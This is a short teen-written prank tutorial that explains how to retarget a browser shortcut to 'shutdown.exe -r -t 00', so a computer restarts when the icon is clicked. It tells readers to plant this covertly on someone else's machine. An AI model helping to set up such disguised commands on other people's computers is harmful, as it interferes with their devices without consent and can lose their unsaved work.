About: Hey guys, I'm just a guy that lives on an island hardly anyone knows about, right next to Seattle. My interests are the same as any 16 year old, computers, cars, biking, and just messing with stuff in general.
for this prank, i have decided to go with a computer prank. This one specifically is called " IE icon click restart. Still do not understand what this does? It makes it so whenever you click the internet explorer or mozilla firefox icon, the computer will restart itself.
All you need to do this prank is at least 2 minutes, might want more though just to be safe
To do this prank, you need:
1. computer(1)
2.2-5 minutes
3. And a writen code ( I have provided)

Step 1: Internet Explorer Properties
now, you need to right click your internet explorer and hit "properties"
this will open a window with three tabs, click the 2nd tab if your not there.
in the target box, put this in instead of the original
%windir%\system32\shutdown.exe -r -t 00
this will make it so when you click the icon, it will restart by using the system 32 file
WARNING!! make sure you wrote down or memorized the file name for the internet explorer target.

Step 2: And Your Done!!
yes, this is a very sort instructable but enough to piss someone off a lot! exit out of the properties and leave before he/she suspects something. once they click it, it will restart!
